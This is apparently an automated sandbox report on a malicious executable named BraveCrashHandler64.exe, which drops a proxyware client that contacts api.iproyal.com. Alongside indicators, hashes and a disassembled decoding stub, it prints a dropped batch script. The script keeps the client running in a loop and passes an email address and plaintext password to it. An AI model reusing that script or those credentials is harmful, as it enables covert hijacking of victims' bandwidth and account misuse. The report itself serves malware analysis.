http://policy.camerfirma.com0	RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	false	URL Reputation: safe	unknown
http://crl.certigna.fr/certignarootca.crl	RuntimeBrooker.exe, 00000007.00000002.1331226063.000000C0001BE000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C00013E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1397301998.000000C0001F8000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1429024893.000000C0001BE000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1492035852.000000C0001BE000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527603413.000000C0001BE000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.xrampsecurity.com/XGCA.crl	RuntimeBrooker.exe, 00000007.00000002.1330810409.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1396266752.000000C000090000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1428365569.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1491215219.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527042507.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1561994832.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/soap/encoding/	RuntimeBrooker.exe, 00000007.00000002.1326236620.00000000007E9000.00000002.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359302875.00000000007E9000.00000002.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393176430.00000000007E9000.00000002.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424722305.00000000007E9000.00000002.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1482658369.00000000007E9000.00000002.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1523871329.00000000007E9000.00000002.00000001.01000000.00000007.sdmp	false		high
http://www.accv.es/legislacion_c.htm0U	RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	false		high
https://api.iproyal.com1714047672worldIsShitty?api.iproyal.com:443tcpapi.iproyal.comws2_32.dllSystem	RuntimeBrooker.exe, 00000007.00000002.1330810409.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wwww.certigna.fr/autorites/0m	RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	false	URL Reputation: safe	unknown
http://ocsp.accv.es0	RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	false	URL Reputation: safe	unknown
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0B1	RuntimeBrooker.exe, 00000007.00000002.1331226063.000000C000180000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C000100000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1397301998.000000C0001B8000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1429024893.000000C000180000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1492035852.000000C000180000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527603413.000000C000180000.00000004.00001000.00020000.00000000.sdmp	false		high
https://api.iproyal.com/v1/users/login	RuntimeBrooker.exe, 0000001A.00000002.1527603413.000000C000240000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527603413.000000C000118000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527042507.000000C000075000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527603413.000000C00016E000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.iproyal.com1714047675worldIsShitty?api.iproyal.com:443tcpapi.iproyal.comws2_32.dllCommon	RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.iproyal.com1714047687worldIsShitty?api.iproyal.com:443tcpapi.iproyal.comws2_32.dllSystem	RuntimeBrooker.exe, 00000015.00000002.1491215219.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.iproyal.comCommonProgramFiles=C:	RuntimeBrooker.exe, 00000007.00000002.1330810409.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1428365569.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1491215219.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527042507.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1561994832.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
https://api.iproyal.com/v1/users/loginPSwCB0VWbAAlZBEwPQBeOA4tBxw9M1FYCQ==AfWgpX0XnpfyEMMJtmlM3HjxKy	RuntimeBrooker.exe, 0000000E.00000002.1397301998.000000C0001F8000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.iproyal.com1714047679worldIsShitty?api.iproyal.com:443tcpapi.iproyal.comws2_32.dllSystem	RuntimeBrooker.exe, 0000000E.00000002.1396266752.000000C0000A2000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.iproyal.com/v1/users/loginPost	RuntimeBrooker.exe, 00000007.00000002.1331226063.000000C000240000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1364194145.000000C0002A4000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1397301998.000000C000292000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1429024893.000000C000240000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1492035852.000000C000240000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527603413.000000C000240000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.catcert.net/verarrel	RuntimeBrooker.exe, 0000001A.00000002.1527603413.000000C000240000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527603413.000000C0001BE000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.securetrust.com/STCA.crl	RuntimeBrooker.exe, 00000007.00000002.1330810409.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1396266752.000000C000090000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1428365569.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1491215219.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527042507.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1561994832.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0	RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	false		high
http://crl.chambersign.org/chambersignroot.crl0	RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	false	URL Reputation: safe	unknown
http://crl.xrampsecurity.com/XGCA.crl0	RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	false	URL Reputation: safe	unknown
https://api.iproyal.com/v1/users/loginPSwCB0VWbAAlZBEwPQBeOA4tBxw9M1FYCQ==7m9fHZvLPTY2pWRLrSiq0MGQOl	RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C0001C0000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.certigna.fr/certignarootca.crlhttp://crl.dhimyotis.com/certignarootca.crl	RuntimeBrooker.exe, 00000007.00000002.1331226063.000000C0001BE000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C00013E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1397301998.000000C0001F8000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1429024893.000000C0001BE000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1492035852.000000C0001BE000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527603413.000000C0001BE000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.catcert.net/verarrel05	RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	false	URL Reputation: safe	unknown
http://crl.certigna.fr/certignarootca.crl01	RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	false	URL Reputation: safe	unknown
http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl	RuntimeBrooker.exe, 00000007.00000002.1330810409.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1396266752.000000C000090000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1428365569.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1491215219.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527042507.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1561994832.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ocsp.accv.esTWCA	RuntimeBrooker.exe, 00000007.00000002.1330810409.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1362399139.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1396266752.000000C0000A2000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000011.00000002.1428365569.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 00000015.00000002.1491215219.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1527042507.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, RuntimeBrooker.exe, 0000001D.00000002.1561994832.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.accv.es00	RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	false	URL Reputation: safe	unknown
http://www.cert.fnmt.es/dpcs/0	RuntimeBrooker.exe, 00000007.00000002.1326472681.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000B.00000002.1359600597.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000000E.00000002.1393382195.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000011.00000002.1424970733.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 00000015.00000002.1484099103.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp, RuntimeBrooker.exe, 0000001A.00000002.1524094265.0000000000AC7000.00000004.00000001.01000000.00000007.sdmp	false		high
https://api.iproyal.com	RuntimeBrooker.exe, 0000001D.00000002.1561994832.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.iproyal.com1714053685worldIsShitty?api.iproyal.com:443tcpapi.iproyal.comws2_32.dllSystem	RuntimeBrooker.exe, 0000001A.00000002.1527042507.000000C00000E000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
193.228.196.69	api.iproyal.com	unknown		62240	CLOUVIDERClouvider-GlobalASNGB	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1431608
Start date and time:	2024-04-25 14:20:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	42
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	BraveCrashHandler64.exe
Detection:	MAL
Classification:	mal84.evad.winEXE@484/2@7/1
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target RuntimeBrooker.exe, PID 1424 because there are no executed function
Execution Graph export aborted for target RuntimeBrooker.exe, PID 3060 because there are no executed function
Execution Graph export aborted for target RuntimeBrooker.exe, PID 3672 because there are no executed function
Execution Graph export aborted for target RuntimeBrooker.exe, PID 4204 because there are no executed function
Execution Graph export aborted for target RuntimeBrooker.exe, PID 4644 because there are no executed function
Execution Graph export aborted for target RuntimeBrooker.exe, PID 6768 because there are no executed function
Execution Graph export aborted for target RuntimeBrooker.exe, PID 7088 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Report size getting too big, too many NtWriteVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:01:37	API Interceptor	3631764x Sleep call for process: BraveCrashHandler64.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.iproyal.com	BraveCrashHandler64.exe	Get hash	malicious	Unknown	Browse	93.189.62.83
	BraveCrashHandler64.exe	Get hash	malicious	Unknown	Browse	93.189.62.83
	BraveCrashHandler64.exe	Get hash	malicious	Unknown	Browse	93.189.62.83
	BraveCrashHandler64.exe	Get hash	malicious	Unknown	Browse	93.189.62.83
	pRTafycKx1.exe	Get hash	malicious	ETERNALBLUE	Browse	23.88.73.143
	pRTafycKx1.exe	Get hash	malicious	ETERNALBLUE	Browse	23.88.73.143
	file.exe	Get hash	malicious	Unknown	Browse	23.88.73.143

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUVIDERClouvider-GlobalASNGB	E3kpuuuOfy.elf	Get hash	malicious	Mirai	Browse	149.37.105.225
	mcBQOzODOZ.elf	Get hash	malicious	Gafgyt	Browse	194.127.178.114
	ecG2qNxHRp.elf	Get hash	malicious	Mirai	Browse	155.254.53.56
	SecuriteInfo.com.Linux.Siggen.9999.23440.5437.elf	Get hash	malicious	Gafgyt	Browse	194.127.178.114
	VPoSIDutL5.elf	Get hash	malicious	Gafgyt	Browse	194.127.178.114
	O4jtP3GIBN.elf	Get hash	malicious	Mirai	Browse	149.37.105.229
	Q9Jn6b7bIj.elf	Get hash	malicious	Mirai	Browse	198.105.115.226
	sUVarESiHq	Get hash	malicious	Gafgyt	Browse	194.127.178.114
	ZpSgnSWPq8.elf	Get hash	malicious	Gafgyt	Browse	194.127.178.114
	H6CLPg2W6D.elf	Get hash	malicious	Unknown	Browse	194.127.178.114

Process:	C:\Users\user\Desktop\BraveCrashHandler64.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	505
Entropy (8bit):	5.119837209547514
Encrypted:	false
SSDEEP:	12:NcJfsal/wAjTg2L7E7oqtxiHqoGToqtxixKR+M:eJEalRjTg2L7E7oIEZGToIEQ+M
MD5:	A6801938FDB133C08A99C9735DEDADC7
SHA1:	D3ABB032A84E8EA20D01F746BA8F49DB1C24C869
SHA-256:	E48C4459C233914320DAA6C6CEC5756DBD9C201AE8FBCFDE3745EE0AEF76F2CF
SHA-512:	03EAE3AFBAEA67FDAE674AA06CDA682360982046B02661BE226AB42E15AFF5AB9CD09515F90404547C32D383385BA822D2B203B5A3457258FADCCD8BAF32D887
Malicious:	false
Preview:	@shift..@echo off..chcp 1252..:LOOP..:B..set MyProcess=RuntimeBrooker.exe..tasklist \| findstr /i "%MyProcess%"..if errorlevel 1 (goto :StartRoutine)..timeout /t 60..goto :B..:StartRoutine..if exist "%SystemRoot%\Temp\RuntimeBrooker.exe" ("%SystemRoot%\Temp\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos) else ("%Temp%\RuntimeBrooker.exe" -email ennareichmann@outlook.com -password Kamus@1993 -device-name M2403 -accept-tos)..goto :B..goto :LOOP..

C:\Users\user\AppData\Local\Temp\RuntimeBrooker.exe

Download File

Process:	C:\Users\user\Desktop\BraveCrashHandler64.exe
File Type:	PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	12024072
Entropy (8bit):	7.996630319116559
Encrypted:	true
SSDEEP:	196608:/VtRsOyxKZXB9jJYt/Tr8verWaS/GiLbN2AsBHTbtlyxE11qU75u4CLNbmCJytzz:dDsOvL91Yt/TouQ/GUphs5btlyx4qU7d
MD5:	7D1082288A0D3F0467C1D57DE7471036
SHA1:	7561A197D02BB43C3868A6FC0BD81A4A34E1570B
SHA-256:	0870DABC1F1D62016D4B5C92565D86E1FE9B45CA26148FE98F0FB8CB811675D8
SHA-512:	DC6337013DC61B9971E5FA2A15B11ED05557C989CDED240DA8DC0D0A2FDD8102D41A0DAA6BB84EB60E1BF09E7093E219D1091D2DB95A973CF01615F163CCD433
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d............"...."......t/..................@.....................................2.....`...@...... ........ ...... .............. Pk......]k.\....0..T....ck..............Pk.............................................................................................../.........................@.............-.../.....................@................p]......^%.............@................Pj.......).............@................`j.......).............@................@r.......0.............@.................s......b2.............@.................s......d2.............@.......................FA.............@.........................K.............@................ ........N.............@................0........N.............@.........................N.............@................ ......."P.............@....rsrc........0......."P.............@...........

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.997145538239493
TrID:	Win32 Executable (generic) a (10002005/4) 99.94% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	BraveCrashHandler64.exe
File size:	14'419'456 bytes
MD5:	d56a7d817c035803b7538f17cc2ead45
SHA1:	19def2b2a35f4df889a19e653f20cdad0861a1e6
SHA256:	2be6c328300e35758dbf7a0aeaaa139cdf83c1f3d62e6aac7abc237a9c8d052c
SHA512:	2702177d0806b175336643a2a246d9f1c8e9673b944b1cef2e9b93943a5f12dd0c1a6e138767d934ca89ea65f84607c50bd38a2affe8b099ee0a083612fc3de1
SSDEEP:	393216:tHY3uPmC0LbppO305T8/p/Zto6CfnCIc8CRr13jv+1:0AmTO305T8/p/Zq658CFlj
TLSH:	28E6331655048E08FDF811BBCE94F518F3BB243026A3115E657880C6EBF754BAA6EE37
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x7953a4
Entrypoint Section:	.data
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x50A6C4BF [Fri Nov 16 22:57:03 2012 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	5e5ac8ab7be27ac2d1c548e5589378b6

Entrypoint Preview

Instruction
jmp 00007FE39539F64Ah
add byte ptr [00000000h+ecx*8], dl
add byte ptr [eax-18h], ah
add byte ptr [eax], al
add byte ptr [eax], al
pop ebp
sub ebp, 00000010h
sub ebp, 003953A4h
jmp 00007FE39539F649h
adc al, 0Dh
outsd
push FFFFFFB8h
movsb
push ebx
cmp dword ptr [eax], eax
add eax, ebp
add eax, 0000004Ch
mov ecx, 000005CFh
mov edx, 54351312h
xor byte ptr [eax], dl
inc eax
dec ecx
jne 00007FE39539F63Ch
jmp 00007FE39539F649h
jnp 00007FE39539F649h
xor byte ptr [ebp-67h], FFFFFFDFh
cdq
wait
adc dl, byte ptr [edx]
adc dl, byte ptr [ebx+1212EAD3h]
adc dl, byte ptr [ecx]
fild qword ptr [edx+12121218h]
test al, 3Ah
adc dl, byte ptr [edx]
adc ah, ch
adc edx, ebx
cdq
xchg eax, ebx
push ds
adc dl, byte ptr [edx]
adc dl, byte ptr [ecx]
xlatb
inc edx
inc edx
jp 00007FE39539F694h
arpl word ptr [edx+edx], bx
jp 00007FE39539F6B5h
cmp byte ptr [edx], dl
adc edi, dword ptr [esi]
jp 00007FE39539F64Eh
sti
inc esp
cli
pop ss
adc dl, byte ptr [edx]
adc bh, bl
cmp dl, byte ptr [edx]
adc dl, byte ptr [edx]
inc edi
inc esi
dec edi
cdq
xchg eax, edi
sbb dl, byte ptr [edx]
adc dl, byte ptr [edx]
cdq
xchg dword ptr [esi], ebx
adc dl, byte ptr [edx]
adc bl, byte ptr [ecx+1212029Fh]
adc dl, bl
sti
adc byte ptr [ebx], ah
adc byte ptr [ecx+1D5B16D0h], dl
xchg eax, edi
out EDh, al
in eax, dx
in eax, dx
dec edi
rcr byte ptr [esi], 1
adc bl, byte ptr [ecx+1216369Eh]
adc dl, byte ptr [edx]
